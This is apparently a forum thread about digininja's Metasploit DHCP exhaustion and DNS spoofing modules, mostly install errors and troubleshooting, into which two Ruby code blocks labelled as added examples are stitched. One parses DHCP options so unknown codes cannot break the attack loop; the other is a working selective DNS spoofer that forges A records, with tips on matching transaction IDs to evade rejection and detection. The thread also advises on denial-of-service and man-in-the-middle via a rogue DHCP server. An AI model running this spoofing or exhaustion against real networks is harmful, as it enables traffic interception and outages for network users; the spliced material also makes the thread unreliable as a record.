
Metasploit Dns And Dhcp Exhaustion


digininja


Weird, why didn't my last post show up when I searched a minute ago, oh well, you got the post twice!

It isn't likely to be hitting the Metasploit SVN any time soon due to license issues with the dhcp module I used: GPLv3 is incompatible with BSD.


[*] WARNING! The following modules could not be loaded!
/pentest/exploits/framework3/modules/auxiliary/digininja/dhcp_exhaustion/exhaust.rb: /pentest/exploits/framework3/modules/auxiliary/digininja/dhcp_exhaustion/exhaust.rb: MissingSourceFile /usr/lib/ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require': no such file to load -- lib/dhcp

       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 550 exploits - 263 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
       =[ svn r9286 updated today (2010.05.11)


  • 3 weeks later...

Hi - I have been using/testing your DHCP exploit and was running into a snag that I hope you could help with. At the end of the module exhausting the IP addresses I never get a timeout/"you win" message. Am I missing something in the configuration?

As extra info, I am running this module in BT4 and tested this against a Win2k3 server and a Linux server with the same results. All three operating systems are within a VMware environment.


I'm having some problems, could you help me please?

[*] The Pcaprub module is not available: no such file to load -- pcaprub
[*] Error: Pcaprub not available
(eval):185:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:93:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:73:in `run_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:82:in `run_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/auxiliary.rb:143:in `cmd_run'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:144:in `run'
./msfconsole:92

I use Ubuntu 10.04, with Fluxbox. I don't know why this keeps throwing errors.


I've just had a dig through the DHCP library I'm using and it looks like all it is is that your DHCP server is sending a field type it doesn't know about.

The DHCP server can send all sorts of information on top of the IP address, such as NTP server and things like that. These all have an ID. 66 is one that the library doesn't understand. This isn't a problem and won't affect anything.

If you want to hide these messages then add

$DHCP_UNKNOWN => Option,

to line 565 of lib/dhcp/dhcp/options.rb

and

$DHCP_UNKNOWN = 0x66

to line 140 of constants.rb in the same directory.

I can't test it but that should fix it. If not, try changing the 0x66 to just 66.

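A worked illustration of the option handling digininja describes above, added here as an example; it is not code from his module or from the dhcp library it wraps. It parses the option area of a DHCP message as RFC 2132 TLVs and keeps any option code it has no decoder for as raw bytes instead of raising, which is the behaviour the patch above is trying to coax out of the library. Option 66 (TFTP server name) is decoded here just to show it is an ordinary option; the site-specific code 224 plays the role of the unknown one. The sample OFFER bytes are constructed for the example.

```ruby
# Example added for this thread, not code from digininja's module or the dhcp library.
# Parses the option area of a DHCP message (RFC 2132 TLV encoding) and keeps
# options it has no decoder for as raw bytes instead of raising on them.

DHCP_MAGIC = "\x63\x82\x53\x63".b   # cookie that precedes the options

# Option codes this example knows how to decode (RFC 2132 names).
KNOWN_OPTIONS = {
  1  => [:subnet_mask,  :ip],
  3  => [:router,       :ip],
  6  => [:dns_server,   :ip],
  51 => [:lease_time,   :u32],
  53 => [:message_type, :u8],
  54 => [:server_id,    :ip],
  66 => [:tftp_server,  :string],
}.freeze

MESSAGE_TYPES = { 1 => :DISCOVER, 2 => :OFFER, 3 => :REQUEST, 5 => :ACK, 6 => :NAK }.freeze

def decode_value(kind, raw)
  case kind
  when :ip     then raw.unpack('C4').join('.')
  when :u32    then raw.unpack1('N')
  when :u8     then raw.unpack1('C')
  when :string then raw.dup.force_encoding('UTF-8')
  end
end

# Returns a hash of option name => decoded value. Unknown codes are collected
# under :unknown as code => raw bytes. Only a truncated option is an error.
def parse_dhcp_options(bytes)
  bytes = bytes.b
  raise ArgumentError, 'missing magic cookie' unless bytes.byteslice(0, 4) == DHCP_MAGIC
  opts = {}
  i = 4
  while i < bytes.bytesize
    code = bytes.getbyte(i)
    i += 1
    next if code == 0      # pad: no length byte
    break if code == 255   # end of options
    len = bytes.getbyte(i)
    raise ArgumentError, "truncated option #{code}" if len.nil? || i + 1 + len > bytes.bytesize
    raw = bytes.byteslice(i + 1, len)
    i += 1 + len
    name, kind = KNOWN_OPTIONS[code]
    if name
      opts[name] = decode_value(kind, raw)
    else
      (opts[:unknown] ||= {})[code] = raw   # keep it: an unknown option is data, not an error
    end
  end
  if opts.key?(:message_type)
    opts[:message_type] = MESSAGE_TYPES.fetch(opts[:message_type], opts[:message_type])
  end
  opts
end

# Constructed sample: the option area of an OFFER from a server that also
# advertises a TFTP server name (66) and a site-specific option (224).
SAMPLE_OFFER_OPTIONS = [
  DHCP_MAGIC,
  [53, 1, 2].pack('C*'),                    # DHCP message type: OFFER
  [54, 4, 192, 168, 1, 1].pack('C*'),       # server identifier
  [51, 4].pack('C*') + [3600].pack('N'),    # lease time, seconds
  [1, 4, 255, 255, 255, 0].pack('C*'),      # subnet mask
  [66, 10].pack('C*') + 'tftp.local'.b,     # TFTP server name
  [224, 2, 0xde, 0xad].pack('C*'),          # site-specific option, no decoder here
  "\xff".b,                                 # end
].join.b

if __FILE__ == $0
  parse_dhcp_options(SAMPLE_OFFER_OPTIONS).each { |name, value| puts "#{name}: #{value.inspect}" }
end
```

Run it directly to print the decoded options. The point is the `else` branch: a code the parser has no table entry for is kept and reported, never treated as a failure, so a server that sends option 66 (or anything vendor-specific) cannot break the attack loop.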

For DHCP it depends on what attack you are performing. If all you want to do is a denial of service then you don't need your own server; if you want to man-in-the-middle then yes, set up your own.

dhcpd is a good package, the config file is fairly simple to create.

For DNS you just point it at any existing DNS server, the original one is best, then just replace any requests you want with your own.

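The DNS half of the post above, as an added example (not code from digininja's module): the decision logic of a selective spoofer that answers for names in its override table and hands everything else to the real resolver. The override table and the query packet are constructed for the example; the forwarding itself (send the untouched query to the original server and relay its reply back to the client) is left to the caller, which is what the `nil` return signals.

```ruby
# Example added for this thread, not code from digininja's module.
# Selective DNS spoofing: forge an A answer for names we care about,
# return nil for everything else so the caller forwards it unchanged.

def encode_name(name)
  name.split('.').map { |label| [label.bytesize].pack('C') + label.b }.join + "\x00".b
end

# Parse the 12-byte header and the first question of a DNS query.
# Returns [id, qname, qtype, raw_question_bytes].
def parse_query(pkt)
  pkt = pkt.b
  raise ArgumentError, 'short packet' if pkt.bytesize < 12
  id, flags, qdcount = pkt.unpack('nnn')
  raise ArgumentError, 'not a query' unless (flags & 0x8000).zero?
  raise ArgumentError, 'no question' if qdcount.zero?
  labels = []
  i = 12
  loop do
    len = pkt.getbyte(i)
    raise ArgumentError, 'truncated name' if len.nil?
    raise ArgumentError, 'compression pointer in question' if len >= 0xC0
    i += 1
    break if len.zero?
    labels << pkt.byteslice(i, len)
    i += len
  end
  qtype, qclass = pkt.byteslice(i, 4).unpack('nn')
  raise ArgumentError, 'truncated question' if qclass.nil?
  question = pkt.byteslice(12, i + 4 - 12)
  [id, labels.join('.').downcase, qtype, question]
end

# Build a response that echoes the question and answers it with one A record.
def build_a_response(id, question, ip, ttl: 60)
  header = [id, 0x8180, 1, 1, 0, 0].pack('n6')   # QR=1, RD, RA, NOERROR; 1 question, 1 answer
  answer = "\xC0\x0C".b +                        # name: pointer to the question name at offset 12
           [1, 1, ttl, 4].pack('nnNn') +         # type A, class IN, TTL, rdlength
           ip.split('.').map(&:to_i).pack('C4')
  header + question + answer
end

# Constructed override table: names the attacker answers for, and with what.
OVERRIDES = { 'www.example.com' => '10.0.0.5' }.freeze

# Returns a forged response, or nil meaning "forward to the real resolver".
def spoof_or_forward(query, overrides = OVERRIDES)
  id, qname, qtype, question = parse_query(query)
  return nil unless qtype == 1 && overrides.key?(qname)   # only A queries are answered here
  build_a_response(id, question, overrides[qname])
end

# Helper to construct a client query for the example.
def build_query(id, name, qtype = 1)
  [id, 0x0100, 1, 0, 0, 0].pack('n6') + encode_name(name) + [qtype, 1].pack('nn')
end

if __FILE__ == $0
  q = build_query(0x1234, 'www.example.com')
  r = spoof_or_forward(q)
  puts r ? "spoofed, #{r.bytesize} bytes, answer #{r.byteslice(-4, 4).unpack('C4').join('.')}" : 'forward'
end
```

Two things the branching shows that the one-line description does not: the transaction ID and the question section are copied from the client's query, because a resolver drops an answer whose ID or question does not match; and only the query types you actually have an answer for get spoofed, since forging an A record in reply to an AAAA or MX query produces a malformed answer that clients reject and that stands out in captures.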

Man, something is not right, I try to attack and it is not working...

msf auxiliary(exhaust) > run

[*] DHCP attack started

[*] Timeout waiting for OFFER

[*] Got a timeout, assuming DHCP exhausted. You Win

[*] Finished

[*] Auxiliary module execution completed

Is this normal? I'm not using eth0, I'm using Wi-Fi.


Simple question, are there any DHCP leases left on your DHCP server? If there aren't then there is something wrong.


@c0cac00l..

Are you sure that you are hitting the DHCP server and not a random address?

Use "show options" to check what it's directed to by default (255.255.255.255).

To find out your DHCP server, whip open a command prompt and do an ipconfig; it's your subnet mask. Mine's (255.255.255.0).

Or in Linux... google it ;)

The peerhost (or whatever it was called at the time) is gone, it was only there as a hangover from the module that mine is inherited from. Grab the latest version from my site if you are still on an old version.

Your DHCP server is not your subnet mask. Your subnet mask defines the range of your network IP. On most home networks the DHCP server is the modem/router; on corporate networks it could be a router, a domain controller or any other machine given the task.


What? Your subnet mask is your subnet mask, not your DHCP server. All your subnet mask does is essentially tell you the maximum amount of host IPs possible on your specific network.

ie;

255.255.255.0 (/24) tells me that a maximum of 254 host IPs are possible on your network.

That does not, however, mean that there is a minimum of 254 host IP addresses usable by the DHCP pool on your /24 network. The DHCP server determines your IP pool range in its config file (usually).


  • 1 month later...

DHCP requests don't go across subnets so won't go through a router. If you just have a modem connecting your PC to the ISP network then you would be on the same subnet (the modem has to be to get its DHCP address), so you could try the attack; however, I expect in most cases it would fail as the ISP ties access to its network down to MAC addresses and the fake MAC addresses created by the app won't be allowed on, so it won't work.


  • 4 months later...
  • 3 months later...

Wow this thread seems to be long enough, but I thought this might be the best place for this question. I'm trying to figure out how to run the DHCP Exhaustion module over my wireless card. When the module is loaded and wlan0 is associated with no current DHCP lease, I get "Error: The host (255.255.255.255:67) was unreachable". After I obtain a lease, the module seems to hang indefinitely and nothing appears to happen (no output is displayed). I figured that this was because my card was not running in promiscuous mode, and can't hear any responses assigned to other MAC addresses, but it seems like it should still time out. Anyway, I tried putting my card in monitor mode, but then I get "Error: wlan0 has no ipv4 address". Oddly enough, after running in that configuration, backtrack (4r2) seems to crash. I can't switch to another terminal and I get no response from key strokes (except alt-ctrl-del). I've also tried running the card in managed mode but I get the same error about 255.255.255.255 being unreachable.

I'm using an Acer Aspire One Netbook with an Atheros AR5001 Wireless Network Adapter (rev 01)

Aircrack reports injection works just fine, in case that's an issue.

Any help would be much appreciated.


There is a difference between monitor mode and promiscuous mode, you need promiscuous mode for this to work. Iron Geek did some research on wifi cards that would do promiscuous mode about 6 months ago if you need a list of which can do it.


Ahh, many thanks! I was operating under the assumption that monitor mode was the equivalent of promiscuous for wireless cards. This was because while "ifconfig wlan0 -promisc" didn't return an error, it also didn't add any new status to wlan0 when listing the interface with plain ol' "ifconfig". Looks like I'm going to see if there is an updated driver or go shopping for a usb card. Thanks again for clearing up that road block.


  • 3 months later...

Hmm, I'm still kind of stuck after reading this thread :/

This warning keeps popping up after I fire up my msfconsole:

[-] WARNING! The following modules could not be loaded!
[-] 	/opt/framework-3.7.1/msf3/modules/auxiliary/digininja/dhcp_exhaustion/exhaust.rb: MissingSourceFile no such file to load -- lib/dhcp

Yes, I'm using the latest Ruby build and the latest Metasploit (v3.8.0-dev),

and yes, I extracted it into the right folders:

sudo tar -C /opt/framework-3.7.1/msf3/ -xf msf_dhcp_dns_1.0.tar.bz2

Could anyone please assist me with this problem?

